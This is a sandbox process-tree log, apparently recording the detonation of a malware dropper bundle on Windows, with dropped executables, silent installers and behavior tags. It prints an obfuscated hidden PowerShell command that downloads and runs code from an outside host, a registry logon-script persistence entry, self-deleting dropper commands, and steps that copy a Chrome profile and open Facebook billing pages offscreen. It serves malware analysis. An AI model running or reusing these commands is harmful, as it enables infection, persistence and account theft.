"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
19⤵
PID:9420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
19⤵
PID:9076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
19⤵
PID:4484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5268 /prefetch:8
19⤵
PID:11032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5420 /prefetch:8
19⤵
PID:4968

C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
17⤵
PID:4680

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
18⤵
PID:6548

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
19⤵
PID:10372

C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
17⤵
PID:2152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe /8-2222 & exit
15⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe
C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe /8-2222
16⤵
PID:7916

C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe
"C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe" /8-2222
17⤵
PID:8168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp4axr3c.ult\Four.exe & exit
15⤵
PID:8132

C:\Users\Admin\AppData\Local\Temp\qp4axr3c.ult\Four.exe
C:\Users\Admin\AppData\Local\Temp\qp4axr3c.ult\Four.exe
16⤵
PID:8168

C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:8784

C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe" 1 3.1617574336.606a39c0065ad 104
18⤵
PID:9340

C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe" 2 3.1617574336.606a39c0065ad
19⤵
PID:9664

C:\Users\Admin\AppData\Local\Temp\orre5qnkd5v\fo0ki2uy54w.exe
"C:\Users\Admin\AppData\Local\Temp\orre5qnkd5v\fo0ki2uy54w.exe" /ustwo INSTALL
20⤵
PID:7212

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "fo0ki2uy54w.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\orre5qnkd5v\fo0ki2uy54w.exe" & exit
21⤵
PID:8680

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "fo0ki2uy54w.exe" /f
22⤵
- Kills process with taskkill
PID:5900

C:\Users\Admin\AppData\Local\Temp\2w2ach4x0rf\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\2w2ach4x0rf\Setup3310.exe" /Verysilent /subid=577
20⤵
PID:7684

C:\Users\Admin\AppData\Local\Temp\is-QLG98.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QLG98.tmp\Setup3310.tmp" /SL5="$20966,138429,56832,C:\Users\Admin\AppData\Local\Temp\2w2ach4x0rf\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:1860

C:\Users\Admin\AppData\Local\Temp\is-3L3JR.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3L3JR.tmp\Setup.exe" /Verysilent
22⤵
PID:4728

C:\Users\Admin\AppData\Local\Temp\rqfoalpumup\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\rqfoalpumup\cpyrix.exe" /VERYSILENT
20⤵
PID:9596

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
21⤵
PID:10976

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
22⤵
PID:2080

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
22⤵
PID:5944

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
21⤵
PID:11244

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
22⤵
PID:8424

C:\Users\Admin\AppData\Local\Temp\h0u5443snku\vict.exe
"C:\Users\Admin\AppData\Local\Temp\h0u5443snku\vict.exe" /VERYSILENT /id=535
20⤵
PID:8956

C:\Users\Admin\AppData\Local\Temp\is-1AFJB.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1AFJB.tmp\vict.tmp" /SL5="$30804,870426,780800,C:\Users\Admin\AppData\Local\Temp\h0u5443snku\vict.exe" /VERYSILENT /id=535
21⤵
PID:9184

C:\Users\Admin\AppData\Local\Temp\is-C1EC4.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-C1EC4.tmp\win1host.exe" 535
22⤵
PID:10676

C:\Users\Admin\AppData\Local\Temp\dmepdzrc2ug\app.exe
"C:\Users\Admin\AppData\Local\Temp\dmepdzrc2ug\app.exe" /8-23
20⤵
PID:5952

C:\Users\Admin\AppData\Local\Temp\ZKVXQ8YYJ7\setups.exe
"C:\Users\Admin\AppData\Local\Temp\ZKVXQ8YYJ7\setups.exe" ll
17⤵
PID:8344

C:\Users\Admin\AppData\Local\Temp\is-3830M.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3830M.tmp\setups.tmp" /SL5="$803D2,454998,229376,C:\Users\Admin\AppData\Local\Temp\ZKVXQ8YYJ7\setups.exe" ll
18⤵
PID:8880

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
11⤵
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 948
12⤵
- Program crash
PID:7564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1004
12⤵
- Program crash
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1012
12⤵
- Program crash
PID:6192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1176
12⤵
- Program crash
PID:7416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1188
12⤵
- Program crash
PID:6968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1204
12⤵
- Program crash
PID:7780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1536
12⤵
- Program crash
PID:7236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1556
12⤵
- Program crash
PID:6324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1764
12⤵
- Program crash
PID:7216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1792
12⤵
- Program crash
PID:7904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1704
12⤵
- Program crash
PID:8048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1864
12⤵
- Program crash
PID:8112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 856
12⤵
- Program crash
PID:4616

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
11⤵
PID:3816

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:6524

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:6280

C:\Users\Admin\AppData\Local\Temp\3xlqlf1hx5d\3diiluoqpip.exe
"C:\Users\Admin\AppData\Local\Temp\3xlqlf1hx5d\3diiluoqpip.exe" /ustwo INSTALL
8⤵
- Executes dropped EXE
PID:2304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "3diiluoqpip.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3xlqlf1hx5d\3diiluoqpip.exe" & exit
9⤵
PID:6480

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "3diiluoqpip.exe" /f
10⤵
- Kills process with taskkill
PID:6864

C:\Users\Admin\AppData\Local\Temp\hyfndkpv1wk\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\hyfndkpv1wk\cpyrix.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:3824

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
9⤵
PID:4424

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
10⤵
PID:4512

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
9⤵
PID:5568

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
10⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\tqrymauscas\vict.exe
"C:\Users\Admin\AppData\Local\Temp\tqrymauscas\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
PID:4660

C:\Users\Admin\AppData\Local\Temp\is-1FLB7.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1FLB7.tmp\vict.tmp" /SL5="$A0030,870426,780800,C:\Users\Admin\AppData\Local\Temp\tqrymauscas\vict.exe" /VERYSILENT /id=535
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:584

C:\Users\Admin\AppData\Local\Temp\is-KFD5S.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-KFD5S.tmp\win1host.exe" 535
10⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\VJ14zVcsK.exe
"C:\Users\Admin\AppData\Local\Temp\VJ14zVcsK.exe"
11⤵
PID:3880

C:\Windows\SysWOW64\at.exe
"C:\Windows\System32\at.exe"
12⤵
PID:6028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
12⤵
PID:7004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe
13⤵
PID:4152

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:4104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:8436

C:\Users\Admin\AppData\Local\Temp\403nmoa1hhy\xoay010cepb.exe
"C:\Users\Admin\AppData\Local\Temp\403nmoa1hhy\xoay010cepb.exe"
8⤵
- Executes dropped EXE
PID:3900

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\403nmoa1hhy\xoay010cepb.exe"
9⤵
PID:5960

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
10⤵
- Runs ping.exe
PID:5156

C:\Users\Admin\AppData\Local\Temp\0xrx5wvo5wy\app.exe
"C:\Users\Admin\AppData\Local\Temp\0xrx5wvo5wy\app.exe" /8-23
8⤵
- Executes dropped EXE
PID:2260

C:\Users\Admin\AppData\Local\Temp\0xrx5wvo5wy\app.exe
"C:\Users\Admin\AppData\Local\Temp\0xrx5wvo5wy\app.exe" /8-23
9⤵
PID:3728

C:\Users\Admin\AppData\Local\Temp\gthunqzjlou\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\gthunqzjlou\vpn.exe" /silent /subid=482
8⤵
- Executes dropped EXE
PID:5012

C:\Users\Admin\AppData\Local\Temp\is-CT7JJ.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CT7JJ.tmp\vpn.tmp" /SL5="$20460,15170975,270336,C:\Users\Admin\AppData\Local\Temp\gthunqzjlou\vpn.exe" /silent /subid=482
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:5828

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:2864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:1668

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
PID:6500

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
PID:6404

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
PID:6668

C:\Users\Admin\AppData\Local\Temp\rs1mjuwh0io\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\rs1mjuwh0io\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
- Executes dropped EXE
PID:5192

C:\Users\Admin\AppData\Local\Temp\is-USH47.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-USH47.tmp\IBInstaller_97039.tmp" /SL5="$1049A,14575459,721408,C:\Users\Admin\AppData\Local\Temp\rs1mjuwh0io\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5228

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-4Q4NO.tmp\{app}\microsoft.cab -F:* %ProgramData%
10⤵
PID:5504

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-4Q4NO.tmp\{app}\microsoft.cab -F:* C:\ProgramData
11⤵
PID:5572

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
10⤵
PID:6932

C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
10⤵
PID:6868

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
10⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\v5vxshagcgn\c0kjmtsswjd.exe
"C:\Users\Admin\AppData\Local\Temp\v5vxshagcgn\c0kjmtsswjd.exe" /quiet SILENT=1 AF=756
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5264

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\v5vxshagcgn\c0kjmtsswjd.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\v5vxshagcgn\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617322015 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
9⤵
PID:6768

C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\setups.exe
"C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\setups.exe" ll
5⤵
- Executes dropped EXE
PID:4804

C:\Users\Admin\AppData\Local\Temp\is-0O8PP.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0O8PP.tmp\setups.tmp" /SL5="$40084,454998,229376,C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\setups.exe" ll
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4136

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4144

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
5⤵
- Enumerates system info in registry
PID:184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa3f846e00,0x7ffa3f846e10,0x7ffa3f846e20
6⤵
PID:576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1684 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2176 /prefetch:8
6⤵
PID:4440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:2
6⤵
PID:1124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
6⤵
PID:1516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
6⤵
PID:4896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
6⤵
PID:4376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
6⤵
PID:4648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
6⤵
PID:3964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
6⤵
PID:1156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4668 /prefetch:8
6⤵
PID:5292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4976 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 /prefetch:8
6⤵
PID:6708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5420 /prefetch:8
6⤵
PID:3160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=656 /prefetch:2
6⤵
PID:6776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
6⤵
PID:7636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
6⤵
PID:7264

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
PID:5080

